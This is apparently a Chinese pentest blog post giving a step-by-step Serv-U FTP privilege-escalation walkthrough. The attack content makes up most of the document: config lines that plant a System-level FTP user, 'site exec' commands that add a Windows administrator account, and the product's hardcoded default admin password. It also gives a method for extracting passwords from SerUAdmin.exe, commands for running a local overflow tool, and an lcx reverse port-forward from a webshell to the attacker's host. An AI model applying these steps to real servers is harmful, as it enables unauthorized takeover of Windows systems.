0x00 serv-u简介

  • Serv-U FTP Server,是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等
  • serv-u默认安装目录:C:\Program Files\rhinosoft.com\serv-U
  • serv-u密码文件:ServUDaemon.ini
  • 端口号:默认端口是43958
    ServUDaemon.ini中lccalsetuportNo=端口

0x01 FTP提权方法

1、有修改权限

2、无权限修改

3、serv-u ftp本地溢出权限提升(使用6.0以及以前版本)

4、serv-u ftp转发端口

0x02 有修改权限

步骤如下:
1、判断是否安装serv-u
nmap扫端口确认
2、检查是否有可写权限
一般安装目录 c:\Program Files\Serv-u\SerUDaemon.ini
3、在serv-u中添加用户
在user4=添加一个系统用户

[USER=quan|1]                                //用户名
Password=                       //用户密码加密后的密文
HomeDir=c:\ftp\quan             //目录
RelPaths=3
TimeOut=600                      //超时时间设置
Maintenance=System               //权限
Access1=C:\|RWAMELCDP            //可访问的目录及权限
Access2=d:\|RWAMELCDP            //可访问的目录及权限
Access3=e:\|RWAMELCDP            //可访问的目录及权限
SKEYValues=

password=2位随机字符+md5(2位随机字符+123456)

4、连接目标FTP服务器

ftp 目标IP地址 刚添加的用户密码

5、利用ftp命令quote site exec添加用户加入administrators权限组

quote site exec net user quan quan123 /add
quote site exec net localgroup administrators quan /add

0x03 无修改权限

1、利用md5 直接去解密
2、默认用户名密码
账户:LocalAdministrator ,密码:#l@$ak#.lk;0@P
命令:
cmd /c net user quan quan123 /add & net localgroup administrators quan /add
3、不是默认密码时
直接把SerUAdmin.exe 下载下来
用winhex打开查找LocalAdministrator(选择ANSI字符)进行查找密码

0x04 serv-u ftp本地溢出权限提升(使用6.0以及以前版本)

步骤如下:
1、用Serv-U提权综合工具生成提权工具serv_u.exe
2、先上传 serv_u.exe 到一个盘符下
比如是d盘
3、执行命令

d:\serv_u.exe
d:\serv_u.exe “net user quan quan123 /add”
d:\serv_u.exe “net localgroup administrators quan /add” 

注意命令要有引号

0x05 serv-u ftp转发端口

1、lcx端口转发
在目标Webshell上运行LCX命令

lcx -slave yourIP 5000 127.0.0.1 43958

在本机上运行

lcx -listen 5000 21

2、本机登陆Serv_U
打开本地的SERV_U 在IP上填入127.0.0.1
帐号写LocalAdministrator 密码#l@$ak#.lk;0@P

0x06 参考

https://blog.csdn.net/God_XiangYu/article/details/99692269
https://www.cnblogs.com/feizianquan/p/10891352.html

02-11 20:54